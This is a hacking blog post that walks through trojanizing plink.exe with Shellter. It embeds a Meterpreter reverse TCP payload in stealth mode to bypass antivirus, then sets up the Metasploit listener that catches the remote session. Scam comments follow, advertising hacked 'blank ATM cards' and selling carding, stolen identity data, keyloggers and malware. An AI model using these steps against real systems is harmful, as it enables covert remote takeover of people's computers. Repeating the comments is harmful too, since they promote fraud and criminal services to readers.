Hello Every One Welcome To HacCoders (Information You Can Trust!).. So Today We Will Discuss Anti-Virus ByPass With Shellter.. But First Know What Is Shellter Because Many People Don't Know What is Shelter.. So Let's Start... :)
What Is Shellter..
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.
Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.
Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.
So
enough talk, let’s see it in action!
(Note: As always, never attempt to
access a system that you do not have express written permission to do so. Doing
so is illegal and you could end up in jail.)
1. Download and install “shellter” (
https://www.shellterproject.com/download/
)
I saved the extracted folder to the
/root/Desktop folder. You will need to make the shellter.exe file executable
with the chmod command.
2. Grab “plink.exe” from Kali’s
‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Change to the
‘/root/Desktop/shellter’ directory.
4. Start Shellter – type, “wine shellter.exe”
6. At the PE Target Prompt, enter “plink.exe”
7. When prompted to enable stealth mode enter “Y”:
8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)
Shellter
will then add PolyMorphic code and Obfuscate the file. When done you will see:
You will now have a ‘plink.exe’ (the
shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter
directory.
11. Now we need to start a listener
service on the Kali system using the same settings from above:
- start Metasploit (‘msfconsole’ in a terminal)
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.1.39
- set lport 4545
- exploit
12. Copy the
‘plink.exe’ file to the Windows system:
13. Now, in Windows, If you run plink.exe
from the command prompt:
It lists the help information for the file, but does
not trigger the remote shell yet. But if we actually use plink to connect to
another system (a Raspberry Pi) as seen below:
Notice we get the Raspberry Pi ssh login prompt
through Plink, but we also get a remote session to the Windows box:
We can run “sysinfo” to view information about the computer:
So We Are Sucsess.. Thanks For Reading..
I was searching for loan to sort out my bills& debts, then i saw comments about Blank ATM Credit Card that can be hacked to withdraw money from any ATM machines around you . I doubted thus but decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shock to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com or whatsapp: +1(213)785-1553
ReplyDelete
ReplyDeleteBE SMART AND BECOME RICH IN LESS THAN 3DAYS (williamshackers@hotmail.com)… It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a day with it is about $50,000.(fifty thousand USD) Every now and then I keeping pumping money into my account. Though is illegal,there is no risk of being caught ,because it has been programmed in such a way that it is not traceable,it also has a technique that makes it impossible for the CCTVs to detect you..For details on how to get yours today, email the hackers on : (williamshackers@hotmail.com). Tell your loved once too, and start to live large. That's the simple testimony of how my life changed for good…Love you all …the email address again is email (williamshackers@hotmail.com)…
Tele-gram - @leadsupplier
ReplyDeleteICQ - 75 28 22 040
Skype/Wickr - peeterhacks
Stuff Available Now
Cardi-ng
Spam-ming
Hac-king
FULLZ/Pros/Leads
Mailers
Vir-uses
Kal-i Lin-ux Full Package
De-ep Web Complete Course
Smtp's/rdp's/c-panles/shells
BTC Cr-acker/Flasher
Penetration Testing
FB/WA Hac-king Tricks
Ke-yloggers
Combos
Premium Accounts
LOGs
etc
Feel Free to contact
Guidance will be provided
Available 24/7